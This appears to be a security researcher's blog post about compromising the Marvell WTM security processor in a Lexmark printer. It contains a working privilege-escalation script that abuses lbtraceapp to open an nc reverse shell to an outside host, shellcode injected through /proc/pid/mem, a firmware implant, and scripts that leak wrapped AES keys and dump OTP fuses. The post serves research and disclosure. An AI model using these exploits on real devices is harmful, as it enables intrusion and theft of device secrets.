Let's PWN WTM!
[+] Introduction
In the previous blogpost we talked about Lexmark’s attempt to protect their newer printer firmwares with an additional layer of root filesystem encryption assisted by this Wireless Trusted Module that is part of certain Marvell SoC’s. We demonstrated that by simply replaying some commands to this security processor on a rooted device is enough to turn it into an oracle that can help us decrypt any newer firmwares that are protected by this mechanism. While slightly anti-climatic, we did learn quite a bit about the way WTM works as well.
It’s time to go a bit deeper and explore the other commands supported by the WTM firmware, without going through the existing netlink protocol. We need a way to talk directly to the WTM MMIO interface for starters.
[+] Some assistance from the kernel
Prodding at things like this with a full linux userland to your disposal has some advantages. You can abstract some of the lower level privileged details away in a kernel module, and script the higher level stuff in something like python for a quick turnaround in testing out various things. When I broke the sonos root filesystem encryption I did a similar thing.
So I put together a quick kernel module that would let me peek/poke the WTM MMIO space from userland through sysfs. I also got a quick reminder of how terrible I am at cross-compiling linux kernel modules.
Then when I got to the point where it was time to load my new hax-assistance lkm I realized/memorized the persistent backdoor I was given by Rick did not infact provide me with a root shell, but just a low privileged one: so I could not even load the module. Let’s fix that first. :)
[+] I can haz root?
Luckily, due to some hints in the bulletin for ZDI-23-670, I was able to replicate a recently-ish fixed privilege escalation which was still present in the firmware running on my printer at this moment. Thank you, SYNACKTIV!
This LPE in /usr/bin/lbtraceapp
(a setuid root binary) is hilariously stupid,
so I’m going to skim over the explanation and just leave you with the exploit:
#!/bin/sh
echo "-e printk:console /usr/bin/nc 192.168.1.2 9797 -e /bin/sh" > /tmp/f
/usr/bin/lbtraceapp --apply-config=/tmp/f 2>&1
I’m not even sure what lbtraceapp
is to be entirely honest, it appears to be
some kind of frontend for ftrace
based event tracing. But we don’t really care
at this point, we got our precious rootshell. I automated some setup for sshd
on the printer while I was at it, to get a more ergonomic shell experience. So
we can load the LKM now, yay.
root@ET788C77F816DD:/run/cfs# insmod khax.ko
insmod: ERROR: could not insert module khax.ko: Operation not permitted
What?! Some kind of security policy that prevents us from loading kernel modules? Let’s quickly consult
the code for the init_module
syscall:
static int may_init_module(void)
{
if (!capable(CAP_SYS_MODULE) || modules_disabled)
return -EPERM;
return 0;
}
SYSCALL_DEFINE3(init_module, void __user *, umod,
unsigned long, len, const char __user *, uargs)
{
int err;
struct load_info info = { };
err = may_init_module();
if (err)
return err;
// ... 8< .....
return load_module(&info, uargs, 0);
}
modules_disabled
is definitly not true, the kernel infact has quite a few
loaded modules already. Maybe we are missing the CAP_SYS_MODULE
capability somehow?
root@ET788C77F816DD:~# cat /proc/self/status | grep '^Cap'
CapInh: 0000000000000000
CapPrm: 00000004002c74e2
CapEff: 00000004002c74e2
CapBnd: 00000004002c74e2
CapAmb: 0000000000000000
The CAP_SYS_MODULE
capability has a mask of 0x10, which is indeed not set in the
capability mask we inherited from our lbtraceapp
LPE. Ouch.
[+] .. and all capabilities too, please.
So we need some way to elevate our capabilities to be able to load our kernel module. Peeping in the process tree I found this:
root 683 0.0 0.4 2820 2232 ? Ss Jul29 42:23 /bin/bash /usr/bin/wireless-heartbeat.sh
root 2783 0.0 0.0 2216 428 ? S 03:25 0:00 \_ sleep 20
This is some shellscript that runs infinitely and between each action executes /bin/sleep 20
. If
we look at the capabilities mask for this sleep process we see:
root@ET788C77F816DD:~# cat /proc/$(pidof sleep)/status | grep '^Cap'
CapInh: 0000000000000000
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
.. this process actually does have a fully enabled capabilities mask. so what if
we hijack this process by stomping over some of its code using /proc/pid/mem
?
#!/bin/sh
echo "/usr/bin/nohup /usr/sbin/sshd -f /tmp/sshconf &" > /tmp/s2
echo -en '\x10\xd0M\xe25\x00\x8f\xe2\x00\x00\x8d\xe51\x00\x8f\xe2\x04\x00\x8d\xe5\x00\x00\xa0\xe3\x0c\x00\x8d\xe5\r\x10\xa0\xe1\x10\x00\x8f\xe2\x0bp\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01p\xa0\xe3\x00\x00\x00\xef/bin/sh\x00\x00sh\x00\x00/tmp/s2\x00\x00\x00\x00' > /tmp/sc.bin
dd if=/tmp/sc.bin of=/proc/$(pidof sleep)/mem seek=464796 bs=1
This works nicely. We write some shellcode right after some code in .text
where
the nanosleep
syscall is invoked. The shellcode execve’s another shellscript
from /tmp
, and from there we start the sshd
. our ssh sessions now actually
have a fully permissioned capabilities mask and we can load our kernel module.
root@ET788C77F816DD:/run/cfs# insmod khax.ko
root@ET788C77F816DD:/run/cfs# dmesg | tail
[ 133.200196] HAX: init
[ 133.202809] HAX: Listing all platform devices:
[ 133.202895] HAX: Platform device: (c1a86440) -- d1d20000.wtm-mailbox-controller
[ 133.208959] HAX: WTM base: e0be9000
[ 133.212246] HAX: scratch: virt=ce58f918, phys=e528000
root@ET788C77F816DD:/run/cfs# lsmod | grep hax
khax 16384 0
[+] The WTM MMIO command interface
Quickly circling back to the OLPC input driver that talks to the WTM in the linux kernel, we find these helpful register offset defines:
#define SECURE_PROCESSOR_COMMAND 0x40
#define COMMAND_RETURN_STATUS 0x80
#define COMMAND_FIFO_STATUS 0xc4
#define PJ_RST_INTERRUPT 0xc8
#define PJ_INTERRUPT_MASK 0xcc
Since the OLPC input driver only needs to transfer back-and-forth a minimal amount
of data they only need to deal with a subset of the WTM MMIO space. They clear the
SP_COMMAND_COMPLETE_RESET
bit in the PJ_RST_INTERRUPT
register, write their
command to the SECURE_COMMAND_PROCESSOR
register and wait for the COMMAND_FIFO_STATUS
status to reach a certain value before reading the response back from the COMMAND_RETURN_STATUS
register.
The commands implemented by the wtm-client.ko
driver actually are a bit more complex
and shove some additional arguments into the command parameter registers which start at
register offset 0x00
up till 0x3c
, for a total of 16 DWORDs. Similarly, the response
to commands actually has an additional 16 registers starting at offset 0x84
up till
0xc0
. In short:
- command input consists out of a 32bit “command ID” and up to 64 bytes of data
- command output consists out of a 32bit “command response” and up to 64 bytes data
There are some more bells and whistles in the register map, of course. But for our intents and purposes (sending commands and reading their response in a polled fashion) this is sufficiently enough information for now.
[+] LKM Helper primitives
In our little LKM helper module we implement the following primitives:
Command | Arguments | Explanation |
---|---|---|
CMD_WRITE8 | offset, val | write u8 val to MMIO + offset |
CMD_WRITE16 | offset, val | write u16 val to MMIO + offset |
CMD_WRITE32 | offset, val | write u32 val to MMIO + offset |
CMD_READ8 | offset | read u8 from MMIO + offset |
CMD_READ16 | offset | read u8 from MMIO + offset |
CMD_READ32 | offset | read u8 from MMIO + offset |
CMD_GET_SCRATCH | - | get a (physical) pointer to some scratch space |
CMD_WTM_EXEC_CMD | cmd_id, cmd_args | execute WTM command cmd_id with arguments cmd_arguments |
The ‘scratch space’ is a buffer allocated by the LKM. Some WTM commands expect a physical address
containing additional data input/output. By writing to/reading from /dev/mem
we can populate this
scratch space and read it back in userspace.
[+] Exposing WTM I/O primitives over the network
To further ease in exploration we expose all these primitives using a TCP daemon. Now we can script WTM I/O operations from python on our own computer, instead of copying scripts to the printer and running them there.
For the sake of clarity here’s a poorly drawn diagram of what we have now:
Python talks over TCP/IP to the small daemon running on the printer in userland.
The small daemon can peek poke the WTM interface MMIO through khax.ko
via sysfs.
The small daemon can also I/O the scratch buffer by going through /dev/mem
. the
khax.ko
does the actual MMIO operations and house keeping of the scratch buffer.
A lovely rube goldberg machine.
Now we can do things like:
from wtmclient import *
from util import hexdump
c = WTMClient()
scratch = c.get_scratch()
c.wtm_cmd(WTM_CMD_RNG, [0x80, scratch])
hexdump(c.scratch_read(0, 16))
The whole point is (I’ll just reiterate once again) to avoid recompiling/copying/running. Of course there’s many ways to automate these various tasks, but I’ve always preferred this RPC-ish abstraction of operations.
[+] Wrapped Keys
One of my main interests when it comes to the WTM (keeping in mind the Lexmark printer of course) is this “key (un)wrapping” mechanism. How does it actually work?
The concept of key wrapping is nothing new, of course. You take secret symmetric encryption keys, and you encrypt those with some even more secret keys that are even harder to access. Now your keys have their own keys and then all you need to do is introduce an easy oracle so the whole mechanism becomes useless. ;)
On a highlevel the Lexmark rootfs key unwrapping is done by a single netlink command
0x05
(CMD_AES_OPERATION
). Under the hood this command is composed out of a
few WTM commands, executed in this order: wtm_key_unwrap_load
, followed by wtm_aes_init
and finally wtm_aes_finish
.
Let’s start by analyzing wtm_key_unwrap_load
(0x8003). The arguments for this
command are u16 cipher_id
and u8 *blob
. The cipher_id
describes what kind
of key we are unwrapping.
Some accepted cipher_id
values are:
MODE_AES_128_ECB = 0x8000
MODE_AES_256_ECB = 0x8001
MODE_AES_128_CBC = 0x8004
MODE_AES_256_CBC = 0x8005
The blob is formed like this:
struct key_unwrap_blob_t {
u32 cipher_id_a;
u32 cipher_id_b;
u8 iv[16];
u8 body[0x200];
u8 digest[0x20];
};
The highlevel and heavily simlified implementation of wtm_key_unwrap_load
command
looks something like this:
aes_select_hardware_key()
iv_decrypted = aes_ecb_decrypt(blob->iv, 0x10)
aes_select_hardware_key()
aes_set_iv(iv_decrypted)
body_decrypted = aes_cbc_decrypt(blob->body, 0x200)
if sha256(body_decrypted) == blob->digest:
aes_state_zeroize()
aes_load_key(decrypted_blob[0x20:0x20+aes_keywidth])
return 0
else:
return 0x154
here aes_select_hardware_key
flips a bit in the hardware AES engine’s configuration
register that makes it use a hidden/secret key, that is completely invisbible.
first the iv
is decrypted, then the encrypted body
is decrypted. finally,
a SHA256 digest of the first 0x218 bytes (which is everything minus the digest) of the blob
with now decrypted values is taken and compared against the digest
value from the blob.
If the digest checks out the AES register state is completely zeroized/reset and
the unwrapped key is loaded from the decrypted body at offset +0x20
into the
hardware crypto engine’s key registers (different registers for AES, HMAC, etc.).
So there’s two unknowns (for us) here. First the secret hardware key, and secondly the unwrapped key from the decrypted keyblob, which is loaded directly into the AES engine.
This unwrapped key is then used to (in lexmark’s case) to decrypt the encrypted root filesystem key.
While digging through the (quite extensive) command list in the WTM firmware I found some commands with peculiar names:
0x3001: wtm_load_engine_context
0x3002: wtm_store_engine_context
0x3003: wtm_load_engine_context_external
0x3004: wtm_store_engine_context_external
After reversing them I learned they are used to save/restore the crypto engine state.
The _external
variants will save/load the state to/from some DRAM address we provide. Let’s
see what state is actually preserved when saving, for the AES engine:
int __fastcall aes_store_context(int a1)
{
mem_move32(a1 + 0x10, 0xD1D21000, 7);
mem_move32(a1 + 0x68, 0xD1D21058, 21);
return 0;
}
0xD1D21000
is the base address for the AES engine MMIO. So it saves 7 registers
starting at offset 0x00
, and another 21 registers starting at offset 0x58
. These
are spilled back to a DRAM address we provide (at offset 0x10 and 0x68 respectively).
Let’s have a look at the register map for the AES engine, as far as I’ve managed to infer by looking at code, anyway:
0x00: CONTROL
..
0x0c: STATUS
..
0x18: SIZE
[0x78 .. 0x98]: KEY
[0x98 .. 0xA8]: IV
Yes sorry, quite some gaps and unknowns. But importantly, the KEY
registers are
are actually preserved when this wtm_store_engine_context_external
command is invoked.
Let’s try it out with the wrapped keyblob from lexmark:
c = WTMClient()
scratch = c.get_scratch()
# write wkey4 to scratch
c.scratch_write(0, open("wkey4.bin", "rb").read())
# load wrapped key
c.wtm_cmd(WTM_CMD_KEY_UNWRAP_LOAD, [MODE_AES_256_CBC, scratch])
rv = c.io_read32(REG_CMD_RETURN_STATUS)
assert rv == 0
# store AES engine context to scratch buffer
c.scratch_write(0, b"\xAA" * 0x100)
c.wtm_cmd(WTM_CMD_STORE_ENGINE_CONTEXT_EXTERNAL, [MODE_AES_256_CBC, scratch])
rv = c.io_read32(REG_CMD_RETURN_STATUS)
print("Store engine context status: 0x%08x" % rv)
# dump it to the screen
hexdump(c.scratch_read(0, 0x100))
$ python3 test_unwrap.py
Store engine context status: 0x00000000
00000000: aaaa aaaa aaaa aaaa aaaa aaaa 0580 0000 ................
00000010: 0200 0000 0000 0000 0000 0000 0000 0000 ................
00000020: 0000 0000 0000 0000 0000 0000 aaaa aaaa ................
00000030: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
00000040: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
00000050: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
00000060: aaaa aaaa aaaa aaaa 0000 0000 0000 0000 ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000080: 0000 0000 0000 0000 7930 6820 6430 3064 .........}d*.t./
00000090: 2c20 6730 2064 756d 7020 6a30 3072 2030 $O....U58....i.[
000000a0: 776e 206b 3379 7a21 0000 0000 0000 0000 0....=.w........
000000b0: 0000 0000 0000 0000 0100 0000 aaaa aaaa ................
000000c0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
000000d0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
000000e0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
000000f0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
We expect the key bits to be at 0x88
and onwards .. and well what do you know,
there actually appears to be data there!
If we do a AES-256-CBC decrypt operation on the encrypted rootFS key with the IV that is stored alongside the encrypted rootFS key and the key we just dumped from the AES engine state we do infact get the correct decrypted rootFS key!
So this intermediary key that is typically not leaving WTM can actually be leaked back, fun. We’re still missing the secret algorithm/key that is used by the AES engine though. What we do gain here is the capability to completely decrypt new root filesystem keys offline as long as the wrapped keys are re-used. Lexmark has already been re-using their wrapped keys in newer firmwares. And new wrapped keys can be unwrapped and dumped for offline usage using our oracle capabilities of course.
[+] Going deeper
All this highlevel peeky-pokey of the WTM MMIO interface from the Application Processor side is fun of course, but wouldn’t it be neat if we could get arbitrary code execution on the WTM itself?
There is a ton of commands, surely one of them has a dumb vulnerability? We could audit them all and find something perhaps. We know some of the WTM commands take physical DRAM pointers as arguments, and it can read/write (also through a DMA engine) to them. Makes sense the WTM can access the Application processor’s DRAM.
Is there some dedicated DRAM for the WTM itself, surely they can’t run a full fledged linux kernel entirely from some dedicated SRAM? Or are they.. sharing the same DRAM between the AP and the WTM? That would be naive, right?
Turns out, the WTM’s linux kernel runs entirely from
the same DRAM that is fully accessible by the Appllication Processor. The Wireless Trusted
Module™ can be compromised simply by poking into /dev/mem
from the Untrusted Module™
(lol) at the right spots.
[+] WTM RCE Strategy
Okay, let’s come up with a strategy here. It would be nice if we could expand our existing exploration infrastructure with another layer of indirection. Since we can already talk to the WTM directly through the MMIO command interface it would be nice to replace some pointless command with some shellcode of our own. The replaced command can then implement some sub-commands to do various operations/primitives, but this time executed from the context of code running on the WTM itself!
I chose to hijack the handler for wtm_dh_shared_key_gen
for no good reason
other than because it’s command ID is 0x9001
(its over 9000 lololol).
We’re introducing a really basic implant there:
cmp r0, #1
beq cmd_peek32
cmp r0, #2
beq cmd_poke32
mov r0, #0
bx lr
cmd_peek32:
ldr r1, [r1]
str r1, [r2]
bx lr
cmd_poke32:
str r2, [r1]
mov r0, #0
bx lr
We locate the wtm_dh_shared_key_gen
code by scanning through all of DRAM via
/dev/mem
, and then we stomp over it with our small handler replacement code.
Quite lazy, but we can add some powerful new primitives to our WTMClient
python
codebase now:
WTM_CMD_HAX = 0x9001
def wtm_read32(self, addr):
self.wtm_cmd(WTM_CMD_HAX, [WTM_HAX_CMD_READ32, addr, self.scratch])
return struct.unpack("<L", self.scratch_read(0, 4))[0]
def wtm_write32(self, addr, value):
self.wtm_cmd(WTM_CMD_HAX, [WTM_HAX_CMD_WRITE32, addr, value])
def wtm_clear32(self, addr, value):
self.wtm_write32(addr, self.wtm_read32(addr) & (~value & 0xFFFFFFFF))
def wtm_set32(self, addr, value):
self.wtm_write32(addr, self.wtm_read32(addr) | value)
[+] Now what?
Let’s confirm it works by ehm, reading the WTM BootROM I guess?
from wtmclient import *
c = WTMClient()
ROM_BASE = 0xFFE00000
ROM_SIZE = 0x00020000
rom = b""
for i in range(ROM_SIZE // 4):
rom += c.wtm_read32(ROM_BASE + i * 4).to_bytes(4, "little")
with open("rom.bin", "wb") as f:
f.write(rom)
Let’s try to dump the full eFUSE/OTP array while we’re at it. There is a
highlevel WTM command wtm_otp_block_read
(0x2009), but it doesn’t actually
provide unrestricted access to the full OTP. it keeps a curated list of entries
you can access.
Using our WTM peek/poke implant it’s simple enough to read it out fully by peeking at the right MMIO addresses for the OTP/eFUSE peripheral:
from wtmclient import *
c = WTMClient()
OTP_BASE = 0xD1D22800
OTP_SIZE = 0x800
o = b""
for i in range(OTP_BASE, OTP_BASE + OTP_SIZE, 4):
o += struct.pack("<I", c.wtm_read32(i))
with open("otp.bin", "wb") as f:
f.write(o)
What’s really left (and somewhat worthwhile, for a certain twisted definition of worthwhile) to do though is figuring out how the hidden hardware AES key stuff works. I’ve tried some obvious things like partial key overwrites and whatnot, but so far I haven’t had any luck. That said, I haven’t invested too much time into it either. It’s mostly a prestige thing. Our original goal (dealing with lexmark’s pesky new rootfs encryption) has long been dealt with. ;-)
[+] Conclusion
I had quite some fun working on this software-only OSINT and blackbox-y approach to breaking into the Marvell WTM, and I hope you had some fun reading. The writeup was (as always) done months after the actual hacking, so I hope I didn’t mess up any details. I’ve tried to structure the blogposts as some kind of incremental buildup, but the actual order of my research at the time was very out-of-order with what you read here. I’ve cleaned up a bit and published all the relevant code.
Enjoy!